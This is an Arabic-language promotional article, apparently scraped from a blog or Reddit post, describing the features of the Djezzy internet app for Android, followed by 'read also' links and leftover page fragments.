ويعمل التطبيق على جميع أنظمة الويندوز وبكفاءة عالية جدا، حيث يستطيع المستخدم التواصل مع الأصدقاء والاقارب في نفس المكان والوقت الذي هو يريده، ويحتوي هذا التطبيق المميز على العديد من الخيارات والأدوات التي يتمكن المستخدم التحكم في جميع قدرات التطبيق وامكانياته.

خصائص تطبيق جيزي للاندرويد

يعد تطبيق جيزي من التطبيقات المميزة التي تعمل على اجهزة الاندرويد، ولا يحتاج من المستخدم خبرة كبيرة حتى يستفيد من الخدمات المتاحة فيه، كما ان هناك العديد من المستخدمين ينضمون للتطبيق بسبب مميزاته الرائعة التي تقدم في مجال عروض الانترنت.
يتيح التطبيق للمستخدم إمكانية التواصل مع جميع الأصدقاء والأصحاب في نفس الوقت، كما انه يتيح للمستخدم إمكانية التعرف على السرعة على رقم هاتفه، ونوع الخط والشريحة سواء الجيل الثالث او الرابع.
وتطبيق جازي انترنت يظهر للمستخدم بشكل أوتوماتيكي، فهو اصبح من اهم وافضل التطبيقات الخاصة بعروض الانترنت، كما انه مجاني بالكامل ولا يتطلب من المستخدم دفع رسوم اشتراك لتحميله، كما انه لا يحتاج للتسجيل المستخدم حتى يستطيع التمتع بالخدمات والمميزات المتاحة.
وتطبيق جيزي انترنت يدعم جميع أنظمة الانترنت، كما انه لا يحتاج الى مواصفات معينة حتى يعمل التطبيق، وعلى المستخدم الاستفادة من الخدمات والعروض ان يقوم بتحميله على جهاز الاندرويد وتثبيت التطبيق بالطريقة الصحيحة.
وبعد ذلك يعمل على فتح التطبيق للإطلاع على جميع عروض الانترنت المتاحة داخل التطبيق، كما انه لا يحتاج إلى تسجيل الدخول للوصول الى العروض التي يريدها المستخدم، كما أن طريقة استخدامه سهلة جدا.

مميزات تطبيق جيزي انترنت

اقرأ ايضاً:

  1. تحميل تطبيق my heritage تحريك الصور القديمة للمتوفى وجعلها تتكلم
  2. تحميل تطبيق سيريا ستور للايفون 2022 مجانا
  3. تحميل تطبيق الحصن كورونا الامارات للايفون والاندرويد 2022 ALHOSN UAE‏ مجانا
submitted by huaweiee to u/huaweiee [link] [comments]

Brian http://www.blogger.com/profile/12325915722251482731 [email protected] Blogger 110 1 25 tag:blogger.com,1999:blog-3223468286405675937.post-4412205383418656664 ...

[index] [8995] [2340] [12459] [6461] [11186] [13145] [7457] [10933] [6428] [7819]

#

test2